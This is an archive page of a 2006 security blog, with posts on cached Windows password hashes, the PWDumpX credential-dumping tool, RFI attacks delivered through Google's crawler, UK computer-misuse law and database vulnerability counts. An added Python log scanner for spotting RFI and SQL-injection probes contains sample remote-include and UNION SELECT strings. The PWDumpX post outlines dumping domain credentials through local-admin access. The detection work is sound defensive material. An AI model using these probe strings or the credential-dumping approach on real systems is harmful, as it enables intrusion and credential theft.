November 2006 Archives

More on windows cached password recovery


Hmm, looks like it's not quite as bad as I thought it was. After a bit more reading on the subject, the Windows cached password is not just an NTLM hash; it's actually a salted hash, with the salt being the username.

So rainbow tables aren't really a practical attack for this, although it's interesting to note that there's a John the Ripper plug-in for cachedump now which enables you to do dictionary-based/brute-force attacks on retrieved credentials.

PWDumpX


Reed Arvin # Security Tools

A listing of some cool-looking security tools. In particular, I think that PWDumpX could be an interesting one.

I've not had a chance to play with it yet, but it seems to me that the implication is that in an enterprise environment, if you have access to a local admin set of credentials (which, depending on how your company manages local admin accounts, may be pretty easy) or if your domain account has local admin, you could use this tool to dump the domain credentials of any user by running it against the machine they're logged in to. Of course, once you've got the credentials you need to decrypt them, but then, that's what rainbow tables are for!

If it works like that it's actually a pretty sneaky attack, definitely one to test.

Using google to hack for you


SecuriTeam Blogs » Anonymizing RFI Attacks Through Google

Interesting post at the SecuriTeam blog, giving some more detail on the idea of using Google to hack for you by getting it to spider links which contain exploits.

Of course, in addition to the RFI (remote file inclusion) vulnerabilities they're talking about, it would be possible to do SQL injection this way, although you'd need to either understand the app well before the attack or leave footprints all over the site as you work out the correct injection string.

As the comments on the blog point out, this isn't a new attack, but there is some good detail, including solid information about this being exploited in the wild, which is interesting as I wasn't aware of it as anything more than a concept...

I wonder how long it is before someone tries to sue Google for "hacking their site" !
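The defender's side of the trick described above, as an added example (not code from the SecuriTeam post or from any project it names): scan web-server access logs for requests whose query parameters carry an absolute URL (the RFI signature) or an obvious injection string, and flag whether they arrived under a search-engine crawler's User-Agent, which is exactly what spidering an attacker's link list produces. The log lines, crawler list and SQL-injection pattern are constructed for the example; a real deployment would tune the signatures and expect false positives.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substrings identifying the major crawlers (assumed list; extend as needed).
CRAWLER_UAS = ("Googlebot", "msnbot", "Yahoo! Slurp")

# Crude SQL-injection signature for the example; expect false positives on real traffic.
SQLI_RE = re.compile(r"(?i)(?:\bunion\b\s+(?:all\s+)?\bselect\b|'\s*(?:or|and)\b)")

def probe_kind(value: str):
    """Classify one decoded parameter value as 'rfi', 'sqli' or None."""
    v = value.strip()
    if v.lower().startswith(("http://", "https://", "ftp://")):
        return "rfi"          # absolute URL where the app expects a page/file name
    if SQLI_RE.search(v):
        return "sqli"
    return None

def suspicious_params(request_path: str):
    """(name, value, kind) for every query parameter that looks like a probe."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_path).query, keep_blank_values=True):
        kind = probe_kind(value)
        if kind:
            hits.append((name, value, kind))
    return hits

def scan(lines):
    """One finding per log line carrying an RFI- or SQLi-looking parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip
        hits = suspicious_params(m.group("path"))
        if not hits:
            continue
        findings.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "referer": m.group("ref"),
            # True when the probe was delivered by a crawler, i.e. the real attacker
            # is hidden behind the search engine and the referer (if any) is the lure.
            "via_crawler": any(tag in m.group("ua") for tag in CRAWLER_UAS),
            "params": hits,
        })
    return findings

# Constructed sample lines (documentation-range IPs, fictional paths).
SAMPLE_LOG = [
    '66.249.66.1 - - [12/Nov/2006:10:14:03 +0000] "GET /index.php?page=http://203.0.113.5/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.7 - - [12/Nov/2006:10:15:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '66.249.66.1 - - [12/Nov/2006:10:16:45 +0000] "GET /view.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 300 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.9 - - [12/Nov/2006:10:17:02 +0000] "GET /view.php?inc=http%3A%2F%2F203.0.113.5%2Fc.txt%3F HTTP/1.1" 404 300 "http://example.net/links.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The crawler-sourced hits are the ones where blocking the client IP achieves nothing; the useful evidence there is the referer on non-crawler hits (the page the bot or a victim followed the link from) and, on the application side, making sure the include parameter can never resolve to a remote URL at all.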

New UK Computer Misuse Act... Yeuch


There are some amendments to the Computer Misuse Act in the new Police and Justice Act, and some of them do not sound like good news for the UK penetration testing and security research community.

Looking at Section 37 of the Act you get this:

(1) A person is guilty of an offence if he makes, adapts, supplies or offers
to supply any article intending it to be used to commit, or to assist in
the commission of, an offence under section 1 or 3.
(2) A person is guilty of an offence if he supplies or offers to supply any
article believing that it is likely to be used to commit, or to assist in the
commission of, an offence under section 1 or 3.
(3) A person is guilty of an offence if he obtains any article with a view to
its being supplied for use to commit, or to assist in the commission of,
an offence under section 1 or 3.

(Offences under section 1 or 3 are basically unauthorised access to computer material and unauthorised acts that impair the operation of a computer.)

To my mind that leaves people publishing exploit code in the UK in serious trouble, along with anyone selling or making open source penetration testing software. It would be pretty hard to argue that you didn't believe it was likely that a tool that could be used for pen testing could also be used by someone to break into a system, as the only thing that's really different is the intent!

The Act also covers DoS (or, as the Act calls it, reckless impairment of the operation of a computer), so would it follow that software which stress-tests systems would also fall foul of the Act?

I expect that what'll happen is that we'll get some chat from government officials that "legitimate security professionals won't be targeted", but I for one really don't like the idea that I could be committing an offence and be relying on someone's definition of "legitimate" to avoid being prosecuted!

More on Database vulnerability numbers


There's some more data comparing Oracle and MS SQL Server vulnerability levels over at Michael Howard's blog.

There's a link to a study by David Litchfield on the numbers here, which comes to pretty much the same conclusion as looking at the Secunia numbers, but does a more accurate job of analysing the findings by looking at a number of sources.

The clear point is that Microsoft have done a very good job on the security of MS SQL Server 2005, and if someone were to ask me about a choice between these two "enterprise database" vendors in terms of security, it would be a bit of a no-brainer!

One thing you can see is that this study, whilst still coming to the same conclusion (that MS SQL Server is more secure than Oracle), actually has quite different numbers from the ESG study that was quoted in Michael's earlier blog posting here.

At a rough count the NGS paper lists ~58 MS SQL vulnerabilities whilst the ESG one lists fewer than 10 (there's no background data so it's kind of hard to tell), and it's a similar story for Oracle, with well over a hundred in the NGS paper and only 70 in the ESG one.

IMO that's a good reason to actually dig a bit deeper on these things rather than go with something like CVE, which isn't really designed for the purpose. The same result has come out, but by being able to see what's being counted it becomes more believable and less open to people arguing about the stats....

Database Vulnerability numbers


There's a post over at Michael Howard's blog about a study showing that Microsoft SQL Server has a better security record than Oracle or MySQL.

Whilst I agree with the overall point (SQL Server, especially 2005, is waaay better than Oracle/MySQL on the security front), the numbers this study uses seem odd..

They've not specified product version, and that's just going to make the numbers very odd; they've also not (that I can see) specified their exact methodology, and the comment above implies that their methodology may not be the best!

Here's a better (IMO) analysis, using Secunia, which actually breaks things down well by product:

Number of advisories per product from 2003-2006

Microsoft SQL Server 2000 - 10
Microsoft SQL Server 2005 - 0
MySQL 3 - 11
MySQL 4 - 19
MySQL 5 - 5
Oracle 8i - 17
Oracle 9i Enterprise - 23
Oracle 10g - 13

Now I know it's possible to argue the point around severity etc. and product age, but I'd say it's still a pretty clear win for Microsoft...


About this Archive

This page is an archive of entries from November 2006 listed from newest to oldest.
